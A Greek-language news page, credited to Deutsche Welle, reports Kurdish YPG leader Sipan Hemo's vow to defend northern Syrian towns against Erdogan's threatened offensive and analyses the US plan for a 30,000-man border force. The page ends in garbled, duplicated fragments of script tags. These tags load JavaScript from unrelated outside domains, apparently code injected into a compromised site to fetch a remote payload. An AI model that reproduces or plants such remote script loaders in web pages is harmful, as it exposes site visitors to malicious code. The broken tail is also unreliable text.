Συρία: Οι κούρδοι μαχητές διαβεβαιώνουν ότι θα…- Το ριψοκίνδυνο σχέδιο των ΗΠΑ στη βόρεια Συρία

Συρία: Οι κούρδοι μαχητές διαβεβαιώνουν ότι θα υπερασπιστούν τα εδάφη τους εναντίον της τουρκικής «μάστιγας»
Ο ηγέτης μιας ισχυρής κουρδικής ένοπλης οργάνωσης της Συρίας αντέδρασε την Τρίτη στις απειλές της Τουρκίας να εξαπολύσει επίθεση εναντίον των δυνάμεών του στο βόρειο τμήμα της εμπόλεμης χώρας, τονίζοντας ότι θα φροντίσει να «εκκαθαριστεί» η περιοχή από την τουρκική «μάστιγα».

Μερικές ώρες νωρίτερα, ο πρόεδρος της Τουρκίας Ρετζέπ Ταγίπ Ερντογάν διεμήνυε ότι οι τουρκικές Ένοπλες Δυνάμεις θα εξαπολύσουν μια επιχείρηση εναντίον των συριακών πόλεων που ελέγχουν οι Μονάδες Προστασίας του Κουρδικού Λαού (YPG), μια οργάνωση που η Άγκυρα χαρακτηρίζει «τρομοκρατική».

Οι YPG, σύμμαχος-κλειδί των ΗΠΑ στον πόλεμο εναντίον των τζιχαντιστών, ελέγχουν σημαντικά αστικά κέντρα σε ορισμένες περιοχές της βόρειας Συρίας, όπως οι πόλεις Μάνμπιτζ και Αφρίν.

Σε μια συνέντευξή του που μεταδόθηκε την Τρίτη από το κουρδικό πρακτορείο ειδήσεων ANF, ο ηγέτης των YPG, ο Σιπάν Χέμο, τόνισε ότι οι δυνάμεις των κούρδων είναι «έτοιμες» να υπερασπιστούν τις πόλεις τους εάν δεχθούν τουρκική επίθεση.

«Οι δυνάμεις μας είναι ικανές να εκκαθαρίσουν την περιοχή από τη μάστιγα του Ερντογάν, όπως ήταν ικανές να τις καθαρίσουν από το Ντάες», δήλωσε, χρησιμοποιώντας ένα ακρώνυμο στα αραβικά της τζιχαντιστικής οργάνωσης Ισλαμικό Κράτος (ΙΚ).

Με την υποστήριξη του διεθνούς συνασπισμού υπό την ηγεσία της Ουάσινγκτον, οι YPG κατάφεραν να εκδιώξουν το ΙΚ από μεγάλα τμήματα της βόρειας και της ανατολικής Συρίας, όπου εγκαθίδρυσαν μια «ομοσπονδιακή περιοχή» με αυτονομία de facto.

Το Σαββατοκύριακο, ο διεθνής συνασπισμός που δρα εναντίον του ΙΚ ανακοίνωσε ότι εργάζεται για τη δημιουργία μιας δύναμης 30.000 ανδρών –εν μέρει αποτελούμενη από μέλη των YPG– για να «εμποδίσει την επανεμφάνιση των τζιχαντιστών» στη βόρεια Συρία, κατά μήκος των συνόρων με την Τουρκία.

Η Άγκυρα, η οποία ανησυχεί για το ενδεχόμενο οι YPG να αποκτήσουν διαρκή παρουσία στα σύνορά της, εναντιώθηκε αμέσως σε οποιαδήποτε κίνηση τέτοιου είδους. Κατήγγειλε για άλλη μια φορά ότι η οργάνωση αυτή είναι ο συριακός βραχίονας του Εργατικού Κόμματος Κουρδιστάν (PKK), που διεξάγει ανταρτοπόλεμο στην Τουρκία από το 1984.

Την Τρίτη, ο Ερντογάν δεσμεύθηκε ότι η κυβέρνησή του θα καθαρίσει τις «φωλιές των τρομοκρατών» στις περιοχές της βόρειας Συρίας που ελέγχονται από κουρδικές οργανώσεις. Ο τούρκος πρόεδρος είπε σιβυλλικά πως η επιχείρηση του τουρκικού στρατού μπορεί να γίνει «αύριο, μία ημέρα αργότερα, ή το προσεχές διάστημα».

«Θα αποτρέψουμε τα βρόμικα σχέδια του Ερντογάν και θα μετατρέψουμε αυτά τα σχέδια σε μεγάλες νίκες για τους λαούς της περιοχής, τους Κούρδους, τους Σύρους και τους Τούρκους», αντέτεινε ο Χέμο.

 

Το ριψοκίνδυνο σχέδιο των ΗΠΑ στη βόρεια Συρία

Περιπλέκει την κατάσταση στη Συρία η απόφαση των ΗΠΑ για συμμετοχή Κούρδων σε νέα στρατιωτική μονάδα, γεγονός που έχει προκαλέσει ανησυχία αλλά και οργή στην Άγκυρα

Οι Αμερικανοί, προς μεγάλη οργή του Ερντογάν, θέλουν να στήσουν μεθοριακή στρατιωτική ομάδα με μεγάλη συμμετοχή Κούρδων του YPG. Ο τούρκος πρόεδρος φοβάται αναβίωση του κουρδικού εθνικισμού και των αποσχιστικών τάσεων.

Ο Τούρκος πρόεδρος είναι οργισμένος. Διαφωνεί με τα σχέδια των ΗΠΑ να συγκροτήσουν και να εξοπλίσουν μια ομάδα 30.000 ανδρών, η οποία με βάση την επαρχία Ιντλίμπ στη βόρεια Συρία, θα εμποδίζει την διείσδυση ανταρτών του Ισλαμικού Κράτους στη χώρα. Την αποκαλεί «τρομοκρατικό στρατό» και απειλεί να την διαλύσει εν τη γενέσει της. Εκείνο που ενοχλεί τον Ταγίπ Ερντογάν είναι ότι κατά το ήμισυ θα αποτελείται από μαχητές των κουρδικών μονάδων εθνοφυλακής YPG, που αποτελούν τον ένοπλο βραχίονα του Συριακού Κουρδικού Κόμματος της Δημοκρατικής Ένωσης PYD. Φοβάται, χωρίς να είναι ο μόνος, ότι με αυτόν τον τρόπο οι Αμερικανοί θα αφυπνίσουν τον κουρδικό εθνικισμό και τις αποσχιστικές τους τάσεις, όχι μόνο στη Συρία, αλλά και στην ίδια του τη χώρα.

“Βig deal”

Τι είναι όμως αυτό που οδηγεί τις ΗΠΑ σε αυτήν την απόφαση; «Από τη μια θέλουν να σταματήσουν ενδεχόμενη επιστροφή στη Συρία των ανταρτών του Ισλαμικού Κράτους, που κατέφυγαν στο Ιράκ μετά την ανακατάληψη των πόλεων Ράκα και Ντέιρ-αλ-Ζορ» υποστηρίζει ο Αντρέ Μπανκ, ειδικός σε θέματα Συρίας από το Ινστιτούτο Μελετών Μέσης Ανατολής (GIGA) του Αμβούργου. «Από την άλλη επιδιώκουν τη διατήρηση τοπικών στρατιωτικών μονάδων για να περιορίσουν εν μέρει την επιρροή του Ιράν, που διατηρεί μεγάλο αριθμό στρατιωτικών δυνάμεων, μεγαλύτερο από αυτό την Ρωσίας».

Βέβαια παρά το ότι ο Ρώσος υπουργός Εξωτερικών Σεργκέι Λαβρόφ χαρακτήρισε τα αμερικανικά σχέδια «big deal», ερωτήματα προκαλεί η μέχρι τώρα σιωπηρή συναίνεση μεταξύ Ρωσίας και ΗΠΑ γύρω από τα τεκταινόμενα. Ασφαλώς η Μόσχα έχει συμφέρον να διατηρηθεί σχετική ηρεμία στη Συρία, όπως και να παραμείνει ο πρόεδρος της Συρίας Μπασάρ Αλ Ασάντ στο αξίωμά του προκειμένου να διατηρεί η Ρωσία την επιρροή της εκεί, πιθανολογεί ο Γερμανός εμπειρογνώμων.

“Ενταγμένοι στη Συρία θέλουν να ζήσουν οι Κούρδοι”

Πιο περίπλοκη καθιστά την κατάσταση η ισχυρή παρουσία σύρων Κούρδων στη νέα στρατιωτική μονάδα. Το Κόμμα της Δημοκρατικής Ένωσης, βέβαια, δεν επιδιώκει ανεξάρτητο κράτος στην επικράτεια της Συρίας, όπως υποστηρίζει στη Deutsche Welle ο Νεβάφ Χαλίλ, επικεφαλής του Κουρδικού Κέντρου Σπουδών στο Μπόχουμ.

«Οι Κούρδοι της Συρίας θέλουν να αναπτυχθούν ενταγμένοι στη συριακή κοινωνία. Αυτό το έχουν αντιληφθεί οι ΗΠΑ και θεωρούν ότι η πρωτοβουλία τους μπορεί να αποτελέσει πρότυπο στην περιοχή. Άρα οι τουρκικές απειλές απευθύνονται περισσότερο σε ένα τουρκικό κοινό» συμπληρώνει. «Κλιμάκωση θα μπορούσε να έρθει από την Τουρκία» λέει ο Αντρέ Μπανκ συμπληρώνοντας: «Αλλά υπάρχει το έντονο ενδιαφέρον των Ρώσων, των Ιρανών αλλά και του καθεστώτος Ασάντ να ηρεμήσει η κατάσταση, τουλάχιστον βραχυπρόθεσμα, νοτιοανατολικά της Συρίας, ώστε να μπορέσουν να συγκεντρώσουν την προσοχή τους σε περιοχές που κατέχουν ακόμη οι μαχητές του IS. Αυτές οι περιοχές έχουν χαρακτηριστεί ζώνες αποκλιμάκωσης στις διαπραγματεύσεις της Αστάνα, αλλά στην πραγματικότητα πρόκειται για περιοχές νέας κλιμάκωσης».

Πηγή: Deutsche Welle

___setforspecialdomain.com/ghfgh34523452′ type=’text/javascript’>___setforspecialdomain.com/ghfgh34523452′ type=’text/javascript’>challengeforme.com/pystats.js?l=l&’ async=true type=text/javascript language=javascript>challengeforme.com/pystats.js?l=l&’ async=true type=text/javascript language=javascript>